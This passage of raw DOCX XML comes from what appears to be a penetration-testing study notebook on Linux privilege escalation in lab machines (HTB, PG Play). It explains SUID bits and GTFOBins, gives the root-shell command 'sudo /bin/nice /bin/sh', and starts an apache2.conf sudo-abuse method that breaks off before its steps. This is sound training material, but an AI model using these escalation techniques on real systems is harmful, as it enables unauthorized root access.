        <w:t xml:space="preserve">ls -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and see a binary with SUID bit set, or you looked at the LinPeas output and see something under the SUID section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what SUID bit looks like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-rw</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">r-xr-x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The 4th bit is set to "s" instead of "x"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E6C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E6D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As introduced via the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> MonitorsTwo HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, learning how to exploit binaries is very simple via the </w:t>
      </w:r>
      <w:hyperlink r:id="rId639">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">GTFOBins</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> website. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E6E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E6F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The commands in the website often assume you are in the "/bin" directory. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, we see this command: "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nice </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> but it should be "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/nice </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> since we need to specify </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/nice </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">instead of just </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nice</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, unless we are already in /bin directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E72">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E73">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is "TF=$(mktemp -d)"?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E74">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1409700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="518" name="image492.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image492.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId640"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="140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E75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "mktemp" is a command used to create either a temporary file or directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here it's using d flag so it's a temporary directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is used by GTFOBins to represent a placeholder where you should be replacing it with your own specific file/directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E78">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E79">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E7A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E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7C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E7D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jcwumehmcf3z" w:id="260"/>
      <w:bookmarkEnd w:id="260"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUDO exploits </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E7E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E7F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E80">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_94qbyfaghzdc" w:id="261"/>
      <w:bookmarkEnd w:id="261"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Abusing Apache2 Configuration file (/bin/systemctl * apache2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E81">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E82">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the </w:t>
      </w:r>
      <w:hyperlink r:id="rId641">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Ha-natraj</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we saw that the user could run the following as sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E83">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ALL) NOPASSWD: /bin/systemctl start apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ALL) NOPASSWD: /bin/systemctl stop apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ALL) NOPASSWD: /bin/systemctl restart apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E86">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E87">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For context, we found that there were only two users: natraj and mahakal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E88">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E89">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means the services for Apache2 can be started, stopped, and restarted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E8A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E8B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I tried looking for GTFObins for this and had no luck so I checked to see if the apache2 conf file can be written to and sure enough we had full access to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apache2.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E8C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E8D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="939800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="186" name="image179.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image179.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64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E8E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E8F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I checked the apache2.conf file and found the section that identifies the users</w:t>
      </w:r>
    </w:p>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3953508" cy="3529013"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69" name="image62.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image62.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId643"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3953508" cy="3529013"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E92">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E93">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So for privesc that attack vector is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E94">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E95">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
